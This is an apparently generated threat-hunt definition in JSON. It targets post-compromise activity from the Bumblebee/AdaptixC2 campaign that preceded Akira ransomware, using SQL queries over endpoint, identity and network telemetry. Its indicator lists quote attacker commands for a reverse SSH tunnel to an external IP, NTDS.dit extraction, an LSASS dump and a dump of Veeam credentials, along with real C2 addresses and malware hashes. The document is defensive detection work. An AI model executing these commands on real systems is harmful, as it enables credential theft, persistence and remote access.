{
  "hunt": {
    "meta": {
      "tlp": "clear",
      "hunt": {
        "handoff": "keep-as-periodic-hunt",
        "trigger": "intel-report",
        "methodology": "model-assisted",
        "applicability": "campaign-specific",
        "justification": "Establishment of rogue domain admins and external tunnels represents a critical path to environment compromise. A negative result confirms these persistence vectors are not active."
      },
      "name": "Bumblebee Reconnaissance and Privileged Persistence",
      "type": "investigation",
      "labels": [
        "hunt",
        "attack.t1082",
        "attack.t1087.002",
        "attack.t1069.002",
        "attack.t1136.002",
        "attack.t1021.001",
        "attack.t1133",
        "attack.t1572"
      ],
      "series": {
        "slug": "flash-alert-from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira",
        "index": 2,
        "title": "Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira",
        "total": 3
      },
      "related": [
        {
          "hunt": "bumblebee-initial-access-seo",
          "reason": "Initial access via SEO poisoning leads to the reconnaissance and persistence seen here.",
          "relation": "precedes"
        },
        {
          "hunt": "akira-ransomware-impact",
          "reason": "Successful persistence and discovery are prerequisites for final ransomware deployment.",
          "relation": "follows"
        },
        {
          "hunt": "bumblebee-seo-poisoning-sideloading",
          "relation": "follows"
        }
      ],
      "targets": {
        "hunter": {
          "name": "Hunt agent",
          "agent": true
        },
        "analyst": {
          "name": "Tier-2 analyst",
          "role": "analyst"
        },
        "network": {
          "name": "Network telemetry",
          "category": "network",
          "telemetry": [
            "network"
          ]
        },
        "endpoint": {
          "name": "Endpoint telemetry (hb_ surfaces)",
          "category": "endpoint",
          "telemetry": [
            "endpoint"
          ]
        },
        "identity": {
          "name": "Identity / sign-in telemetry",
          "category": "identity",
          "telemetry": [
            "identity"
          ]
        }
      },
      "analysis": "While single rules might alert on account creation, this hunt correlates that event with preceding domain discovery and subsequent RDP movement and SSH tunneling across three different telemetry surfaces.",
      "coverage": [
        {
          "stage": "discovery-host-and-domain",
          "steps": [
            "discovery-activity"
          ],
          "status": "covered"
        },
        {
          "stage": "persistence-domain-account-creation",
          "steps": [
            "account-persistence"
          ],
          "status": "covered"
        },
        {
          "stage": "lateral-movement-rdp",
          "steps": [
            "rdp-lateral-movement"
          ],
          "status": "covered"
        },
        {
          "stage": "persistence-and-tunneling",
          "steps": [
            "external-tunneling"
          ],
          "status": "covered"
        },
        {
          "stage": "initial-access-seo-poisoning",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "execution-malware-loading",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "command-and-control-bumblebee-adaptix",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "credential-access-ntds-dump",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "credential-access-postgre-lsass",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "exfiltration-sftp",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        },
        {
          "stage": "impact-akira-ransomware",
          "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
          "status": "out_of_scope"
        }
      ],
      "scenario": {
        "stages": [
          {
            "name": "Initial Access via SEO Poisoning",
            "slug": "initial-access-seo-poisoning",
            "tactic": "initial-access",
            "techniques": [
              "T1189"
            ],
            "observables": [
              "opmanager.pro",
              "ManageEngine-OpManager.msi",
              "angryipscanner.org",
              "axiscamerastation.org",
              "ip-scanner.org"
            ]
          },
          {
            "name": "Bumblebee Loading and Execution",
            "slug": "execution-malware-loading",
            "tactic": "execution",
            "techniques": [
              "T1574.002",
              "T1204.002"
            ],
            "observables": [
              "msiexec.exe",
              "consent.exe",
              "msimg32.dll",
              "186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da",
              "a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331"
            ]
          },
          {
            "name": "Bumblebee and Adaptix C2",
            "slug": "command-and-control-bumblebee-adaptix",
            "tactic": "command-and-control",
            "techniques": [
              "T1071.001",
              "T1568.002"
            ],
            "observables": [
              "109.205.195.211",
              "188.40.187.145",
              "172.96.137.160",
              "ev2sirbd269o5j.org",
              "2rxyt9urhq0bgj.org",
              "AdgNsy.exe"
            ]
          },
          {
            "name": "Host and Domain Reconnaissance",
            "slug": "discovery-host-and-domain",
            "tactic": "discovery",
            "techniques": [
              "T1082",
              "T1087.002",
              "T1069.002"
            ],
            "observables": [
              "systeminfo",
              "nltest /dclist:",
              "whoami /groups",
              "net group \"domain admins\" /dom"
            ]
          },
          {
            "name": "Privileged Account Creation",
            "slug": "persistence-domain-account-creation",
            "tactic": "persistence",
            "techniques": [
              "T1136.002"
            ],
            "observables": [
              "net user backup_DA",
              "net user backup_EA",
              "net group \"Enterprise Administrators\" backup_EA /add"
            ]
          },
          {
            "name": "Lateral Movement via RDP",
            "slug": "lateral-movement-rdp",
            "tactic": "lateral-movement",
            "techniques": [
              "T1021.001"
            ],
            "observables": [
              "backup_EA"
            ]
          },
          {
            "name": "NTDS.dit Extraction",
            "slug": "credential-access-ntds-dump",
            "tactic": "credential-access",
            "techniques": [
              "T1003.003"
            ],
            "observables": [
              "wbadmin.exe start backup -backuptarget:\\\\127.0.0.1\\C$\\ProgramData\\ -include:\"C:\\windows\\NTDS\\ntds.dit\"",
              "ntds.dit"
            ]
          },
          {
            "name": "Persistence and External Tunneling",
            "slug": "persistence-and-tunneling",
            "tactic": "persistence",
            "techniques": [
              "T1133",
              "T1572"
            ],
            "observables": [
              "RustDesk",
              "ssh root@193.242.184.150 -R *:10400",
              "83.229.17.60"
            ]
          },
          {
            "name": "Database and Memory Credential Theft",
            "slug": "credential-access-postgre-lsass",
            "tactic": "credential-access",
            "techniques": [
              "T1003.001",
              "T1555"
            ],
            "observables": [
              "psql.exe -U postgres -d VeeamBackup -c \"SELECT user_name,password FROM credentials\"",
              "rundll32.exe C:\\windows\\System32\\comsvcs.dll, #+000024"
            ]
          },
          {
            "name": "Data Exfiltration via FileZilla",
            "slug": "exfiltration-sftp",
            "tactic": "exfiltration",
            "techniques": [
              "T1048.003"
            ],
            "observables": [
              "FileZilla",
              "185.174.100.203"
            ]
          },
          {
            "name": "Akira Ransomware Deployment",
            "slug": "impact-akira-ransomware",
            "tactic": "impact",
            "techniques": [
              "T1486"
            ],
            "observables": [
              "locker.exe",
              "win.exe",
              "de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d"
            ]
          }
        ],
        "summary": "Threat actors utilized SEO poisoning for 'ManageEngine OpManager' to deliver Bumblebee malware, which dropped AdaptixC2 for post-exploitation. The intrusion involved domain account creation, NTDS.dit dumping via wbadmin, and lateral movement to a backup server before exfiltrating data and deploying Akira ransomware."
      },
      "severity": "high",
      "rationale": "The hunt begins by identifying hosts that installed software lures mentioned in the research. It then focuses on servers and domain controllers where privileged accounts would be most active.",
      "guardrails": {
        "claims": "no_unsupported",
        "evidence": "citation_required",
        "telemetry": "untrusted",
        "missing_data": "not_benign"
      },
      "hypothesis": "An intruder is performing domain discovery and establishing privileged persistence by creating rogue administrator accounts and external SSH tunnels from compromised systems.",
      "parameters": {
        "tunnel_ips": {
          "from": {
            "ref": "dfir-report-bumblebee-akira",
            "kind": "article",
            "observed": "2025-08-05"
          },
          "type": "list[ip]",
          "default": [
            "193.242.184.150",
            "83.229.17.60",
            "185.174.100.203"
          ],
          "description": "Known external IPs used for SSH tunnels or exfiltration."
        },
        "scope_hosts": {
          "type": "list[host]",
          "default": [],
          "description": "Limit analysis to specific hosts found during scoping; leave empty to scan all hosts."
        },
        "lookback_days": {
          "type": "number",
          "default": "14",
          "description": "Days of history to examine."
        },
        "backup_account_names": {
          "from": {
            "ref": "dfir-report-bumblebee-akira",
            "kind": "article",
            "observed": "2025-08-05"
          },
          "type": "list[string]",
          "default": [
            "backup_DA",
            "backup_EA"
          ],
          "description": "Adversary-created privileged account names observed in the campaign."
        }
      },
      "provenance": {
        "authors": [
          {
            "org": "huntbase.io",
            "name": "Huntbase hunt generation"
          }
        ],
        "generated": {
          "by": "huntbase-hunt-generation",
          "from": "https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/",
          "gates": [
            "dry-run",
            "lint"
          ],
          "model": "hb_google/gemini-3-flash-preview"
        }
      },
      "references": [
        {
          "url": "https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/",
          "name": "The DFIR Report \u2014 From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira"
        }
      ],
      "blind_spots": [
        {
          "id": "domain-controller-logs-missing",
          "risk": "Without DC logon visibility, lateral movement using newly created domain admins cannot be tracked.",
          "stage": "lateral-movement-rdp",
          "question": "whether the rogue account logged into specific domain controllers",
          "requires": "hb_auth_signin populated with Event ID 4624 from all DCs"
        },
        {
          "id": "ssh-tunnel-payload-blindness",
          "risk": "Adversary actions inside an encrypted tunnel are hidden from network inspection.",
          "stage": "persistence-and-tunneling",
          "question": "what commands were sent over the reverse SSH tunnel",
          "requires": "Network proxy or SSL inspection of port 22/10400"
        }
      ]
    },
    "name": "Bumblebee Reconnaissance and Privileged Persistence",
    "description": "This hunt identifies the post-compromise activity of Bumblebee and AdaptixC2, focusing on the critical transition from initial access to full domain control. It examines host and domain reconnaissance command sequences, the creation of privileged backup accounts, and the subsequent use of these accounts for RDP lateral movement and external persistence via RustDesk or SSH tunnels. Following a phased approach, the hunt correlates discovery noise with high-fidelity persistence indicators to confirm a network-wide intrusion."
  },
  "nodes": [
    {
      "id": "hypothesis",
      "type": "hypothesis",
      "label": "Hypothesis",
      "config": {
        "tags": [],
        "series": {
          "slug": "flash-alert-from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira",
          "index": 2,
          "title": "Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira",
          "total": 3
        },
        "coverage": [
          {
            "stage": "discovery-host-and-domain",
            "steps": [
              "discovery-activity"
            ],
            "status": "covered"
          },
          {
            "stage": "persistence-domain-account-creation",
            "steps": [
              "account-persistence"
            ],
            "status": "covered"
          },
          {
            "stage": "lateral-movement-rdp",
            "steps": [
              "rdp-lateral-movement"
            ],
            "status": "covered"
          },
          {
            "stage": "persistence-and-tunneling",
            "steps": [
              "external-tunneling"
            ],
            "status": "covered"
          },
          {
            "stage": "initial-access-seo-poisoning",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "execution-malware-loading",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "command-and-control-bumblebee-adaptix",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "credential-access-ntds-dump",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "credential-access-postgre-lsass",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "exfiltration-sftp",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          },
          {
            "stage": "impact-akira-ransomware",
            "reason": "Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.",
            "status": "out_of_scope"
          }
        ],
        "rationale": "An intruder is performing domain discovery and establishing privileged persistence by creating rogue administrator accounts and external SSH tunnels from compromised systems.",
        "blind_spots": [
          {
            "id": "domain-controller-logs-missing",
            "risk": "Without DC logon visibility, lateral movement using newly created domain admins cannot be tracked.",
            "stage": "lateral-movement-rdp",
            "question": "whether the rogue account logged into specific domain controllers",
            "requires": "hb_auth_signin populated with Event ID 4624 from all DCs"
          },
          {
            "id": "ssh-tunnel-payload-blindness",
            "risk": "Adversary actions inside an encrypted tunnel are hidden from network inspection.",
            "stage": "persistence-and-tunneling",
            "question": "what commands were sent over the reverse SSH tunnel",
            "requires": "Network proxy or SSL inspection of port 22/10400"
          }
        ],
        "scoping_notes": "The hunt begins by identifying hosts that installed software lures mentioned in the research. It then focuses on servers and domain controllers where privileged accounts would be most active.",
        "beyond_detection": "While single rules might alert on account creation, this hunt correlates that event with preceding domain discovery and subsequent RDP movement and SSH tunneling across three different telemetry surfaces."
      }
    },
    {
      "id": "scoping-lure-software",
      "type": "query",
      "label": "Identify hosts with lure software",
      "config": {
        "dsl": "sqlite",
        "role": "scoping",
        "source": "endpoint",
        "content": "SELECT DISTINCT device_hostname FROM hb_software_inventory WHERE (LOWER(package_name) LIKE '%manageengine opmanager%' OR LOWER(package_name) LIKE '%axis camera%' OR LOWER(package_name) LIKE '%angry ip scanner%' OR LOWER(package_name) LIKE '%advanced ip scanner%')",
        "surface": "hb_software_inventory",
        "description": "Find systems where the malicious software installers were likely executed to scope the hunt.",
        "expected_signal": "A list of hosts that have installed target software. These are likely initial beachheads."
      },
      "parents": [
        {
          "id": "hypothesis"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "scoping",
        "label": "Identify hosts with lure software",
        "reads": [
          "device_hostname",
          "package_name",
          "vendor_name"
        ],
        "source": "hb_software_inventory",
        "target": "endpoint",
        "content": "SELECT DISTINCT device_hostname FROM hb_software_inventory WHERE (LOWER(package_name) LIKE '%manageengine opmanager%' OR LOWER(package_name) LIKE '%axis camera%' OR LOWER(package_name) LIKE '%angry ip scanner%' OR LOWER(package_name) LIKE '%advanced ip scanner%')",
        "silence": "not_evidence_of_absence",
        "expected": "A list of hosts that have installed target software. These are likely initial beachheads.",
        "verified": "dry-run",
        "verified_at": "2026-09-20"
      }
    },
    {
      "id": "discovery-activity",
      "type": "query",
      "label": "Host and domain reconnaissance",
      "config": {
        "dsl": "sqlite",
        "role": "triage",
        "source": "endpoint",
        "content": "SELECT device_hostname, process_name, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\\systeminfo.exe' OR LOWER(process_name) LIKE '%\\nltest.exe' OR LOWER(process_name) LIKE '%\\whoami.exe' OR LOWER(process_name) LIKE '%\\net.exe' OR LOWER(process_name) LIKE '%\\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/groups%' OR LOWER(process_cmd_line) LIKE '%/dclist%' OR LOWER(process_cmd_line) LIKE '%domain admins%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')",
        "surface": "hb_process_activity",
        "description": "Find the specific sequence of discovery tools used to map domain admins and enterprise trust.",
        "expected_signal": "Multiple discovery commands executed within a narrow window on a single host."
      },
      "parents": [
        {
          "id": "scoping-lure-software"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "triage",
        "label": "Host and domain reconnaissance",
        "reads": [
          "device_hostname",
          "process_name",
          "process_cmd_line",
          "user_name",
          "time"
        ],
        "source": "hb_process_activity",
        "target": "endpoint",
        "content": "SELECT device_hostname, process_name, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\\systeminfo.exe' OR LOWER(process_name) LIKE '%\\nltest.exe' OR LOWER(process_name) LIKE '%\\whoami.exe' OR LOWER(process_name) LIKE '%\\net.exe' OR LOWER(process_name) LIKE '%\\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/groups%' OR LOWER(process_cmd_line) LIKE '%/dclist%' OR LOWER(process_cmd_line) LIKE '%domain admins%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')",
        "silence": "not_evidence_of_absence",
        "expected": "Multiple discovery commands executed within a narrow window on a single host.",
        "verified": "dry-run",
        "verified_at": "2026-09-20"
      }
    },
    {
      "id": "account-persistence",
      "type": "query",
      "label": "Privileged account creation",
      "config": {
        "dsl": "sqlite",
        "role": "detection-candidate",
        "source": "endpoint",
        "content": "SELECT device_hostname, process_cmd_line, COUNT(DISTINCT device_hostname) AS host_count, MIN(time) AS first_seen FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\\net.exe' OR LOWER(process_name) LIKE '%\\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/add%' OR LOWER(process_cmd_line) LIKE '%backup_%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY process_cmd_line, device_hostname HAVING host_count <= 2",
        "surface": "hb_process_activity",
        "description": "Find rare or suspicious account creations used for domain persistence.",
        "expected_signal": "Commands creating privileged accounts that only appear on a single system."
      },
      "parents": [
        {
          "id": "scoping-lure-software"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "detection-candidate",
        "label": "Privileged account creation",
        "reads": [
          "process_cmd_line",
          "device_hostname",
          "time"
        ],
        "source": "hb_process_activity",
        "target": "endpoint",
        "content": "SELECT device_hostname, process_cmd_line, COUNT(DISTINCT device_hostname) AS host_count, MIN(time) AS first_seen FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\\net.exe' OR LOWER(process_name) LIKE '%\\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/add%' OR LOWER(process_cmd_line) LIKE '%backup_%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY process_cmd_line, device_hostname HAVING host_count <= 2",
        "silence": "not_evidence_of_absence",
        "baseline": {
          "window": "{{lookback_days}}d",
          "compare": "first_seen"
        },
        "expected": "Commands creating privileged accounts that only appear on a single system.",
        "verified": "dry-run",
        "prevalence": {
          "by": "device_hostname",
          "key": [
            "process_cmd_line"
          ],
          "rare_below": 3
        },
        "verified_at": "2026-09-20"
      }
    },
    {
      "id": "triage-early-stage",
      "type": "analytic",
      "label": "Triage discovery and accounts",
      "config": {
        "cite": "required",
        "tools": [
          "endpoint",
          "identity",
          "network"
        ],
        "context": [
          "discovery-activity",
          "account-persistence"
        ],
        "objective": "Determine if discovery tools and net user modifications indicate an adversary establishing a foothold.",
        "description": "Determine if discovery and account creation together confirm a beachhead foothold.",
        "max_iterations": 4,
        "expected_signal": "A per-host verdict on whether initial reconnaissance occurred.",
        "success_criteria": "A list of suspicious hosts with associated malicious accounts."
      },
      "parents": [
        {
          "id": "discovery-activity",
          "kind": "merge"
        },
        {
          "id": "account-persistence",
          "kind": "merge"
        }
      ]
    },
    {
      "id": "external-tunneling",
      "type": "query",
      "label": "SSH and RustDesk tunnels",
      "config": {
        "dsl": "sqlite",
        "role": "enrichment",
        "source": "network",
        "content": "SELECT device_hostname, process_name, dst_endpoint_ip, dst_endpoint_port, time FROM hb_network_connection WHERE (LOWER(process_name) LIKE '%\\ssh.exe' OR LOWER(process_name) LIKE '%\\rustdesk.exe') AND (instr(',' || '{{tunnel_ips}}' || ',', ',' || dst_endpoint_ip || ',') > 0 OR dst_endpoint_port = 10400) AND time >= datetime('now', '-{{lookback_days}} days')",
        "surface": "hb_network_connection",
        "description": "Identify external persistence mechanisms, specifically reverse SSH tunnels or RustDesk connections.",
        "expected_signal": "Connections to known tunnel IPs or use of port 10400 for proxying."
      },
      "parents": [
        {
          "id": "triage-early-stage"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "enrichment",
        "label": "SSH and RustDesk tunnels",
        "reads": [
          "device_hostname",
          "process_name",
          "dst_endpoint_ip",
          "dst_endpoint_port",
          "time"
        ],
        "source": "hb_network_connection",
        "target": "network",
        "content": "SELECT device_hostname, process_name, dst_endpoint_ip, dst_endpoint_port, time FROM hb_network_connection WHERE (LOWER(process_name) LIKE '%\\ssh.exe' OR LOWER(process_name) LIKE '%\\rustdesk.exe') AND (instr(',' || '{{tunnel_ips}}' || ',', ',' || dst_endpoint_ip || ',') > 0 OR dst_endpoint_port = 10400) AND time >= datetime('now', '-{{lookback_days}} days')",
        "silence": "not_evidence_of_absence",
        "expected": "Connections to known tunnel IPs or use of port 10400 for proxying.",
        "verified": "dry-run",
        "verified_at": "2026-09-20"
      }
    },
    {
      "id": "rdp-lateral-movement",
      "type": "query",
      "label": "RDP movement using rogue accounts",
      "config": {
        "dsl": "sqlite",
        "role": "enrichment",
        "source": "identity",
        "content": "SELECT dst_endpoint_name, src_endpoint_ip, actor_user_name, time FROM hb_auth_signin WHERE (instr(',' || '{{backup_account_names}}' || ',', ',' || actor_user_name || ',') > 0 OR actor_user_name LIKE 'backup_%') AND activity_id = 1 AND time >= datetime('now', '-{{lookback_days}} days')",
        "surface": "hb_auth_signin",
        "description": "Track lateral movement from beachheads to domain controllers using the new accounts.",
        "expected_signal": "Logons by rogue accounts to domain controllers or critical internal servers."
      },
      "parents": [
        {
          "id": "triage-early-stage"
        }
      ],
      "primitive_config": {
        "dsl": "sqlite",
        "role": "enrichment",
        "label": "RDP movement using rogue accounts",
        "reads": [
          "dst_endpoint_name",
          "src_endpoint_ip",
          "actor_user_name",
          "time"
        ],
        "source": "hb_auth_signin",
        "target": "identity",
        "content": "SELECT dst_endpoint_name, src_endpoint_ip, actor_user_name, time FROM hb_auth_signin WHERE (instr(',' || '{{backup_account_names}}' || ',', ',' || actor_user_name || ',') > 0 OR actor_user_name LIKE 'backup_%') AND activity_id = 1 AND time >= datetime('now', '-{{lookback_days}} days')",
        "silence": "not_evidence_of_absence",
        "expected": "Logons by rogue accounts to domain controllers or critical internal servers.",
        "verified": "dry-run",
        "verified_at": "2026-09-20"
      }
    },
    {
      "id": "intrusion-correlation",
      "type": "analytic",
      "label": "Correlate full intrusion chain",
      "config": {
        "cite": "required",
        "tools": [
          "endpoint",
          "identity",
          "network"
        ],
        "context": [
          "triage-early-stage",
          "external-tunneling",
          "rdp-lateral-movement"
        ],
        "objective": "Identify hosts and accounts involved in the full Bumblebee intrusion chain by connecting recon to privileged persistence and tunneling.",
        "description": "Synthesize early discovery evidence with follow-on tunneling and lateral movement.",
        "max_iterations": 6,
        "expected_signal": "A detailed intrusion path showing the chain from beachhead to DC.",
        "success_criteria": "A final verdict of malicious for any host showing recon followed by account creation and lateral movement."
      },
      "parents": [
        {
          "id": "external-tunneling",
          "kind": "merge"
        },
        {
          "id": "rdp-lateral-movement",
          "kind": "merge"
        }
      ]
    },
    {
      "id": "route-on-verdict",
      "type": "checkpoint",
      "label": "Route on verdict",
      "config": {
        "fuzzy": true,
        "judge": "hunter",
        "question": "the intrusion-correlation verdict is malicious for at least one host or account",
        "condition": "the intrusion-correlation verdict is malicious for at least one host or account",
        "blind_spot": "domain-controller-logs-missing",
        "confidence": "high",
        "description": "Make a decision based on the correlation agent results.",
        "checkpoint_type": "mandatory"
      },
      "parents": [
        {
          "id": "intrusion-correlation"
        }
      ]
    },
    {
      "id": "isolate-compromised-host",
      "type": "action",
      "label": "Isolate compromised host",
      "config": {
        "target": "endpoint",
        "description": "Sever the adversary connection to the network and prevent movement.",
        "instructions": "Isolate the compromised beachhead host and any destination systems targeted by the rogue accounts. Disable identified backup_ accounts in Active Directory.",
        "action_approval": "required"
      },
      "parents": [
        {
          "id": "route-on-verdict",
          "branch": "on_supports"
        }
      ]
    },
    {
      "id": "analyst-review",
      "type": "task",
      "label": "Analyst review",
      "config": {
        "assignee": "analyst",
        "description": "Perform manual validation of the correlated findings.",
        "instructions": "Review the correlated intrusion timeline. Confirm the source of the initial compromise on beachhead hosts and verify the status of rogue accounts."
      },
      "parents": [
        {
          "id": "route-on-verdict",
          "branch": "default"
        },
        {
          "id": "route-on-verdict",
          "branch": "on_unavailable"
        },
        {
          "id": "isolate-compromised-host"
        }
      ]
    },
    {
      "id": "close-out",
      "type": "task",
      "label": "Close out",
      "config": {
        "assignee": "analyst",
        "description": "Finalize the hunt and record findings.",
        "instructions": "Record what was examined, what was not visible, and whether to schedule a re-run of this phased hunt."
      },
      "parents": [
        {
          "id": "route-on-verdict",
          "branch": "on_refutes"
        },
        {
          "id": "analyst-review"
        }
      ]
    }
  ]
}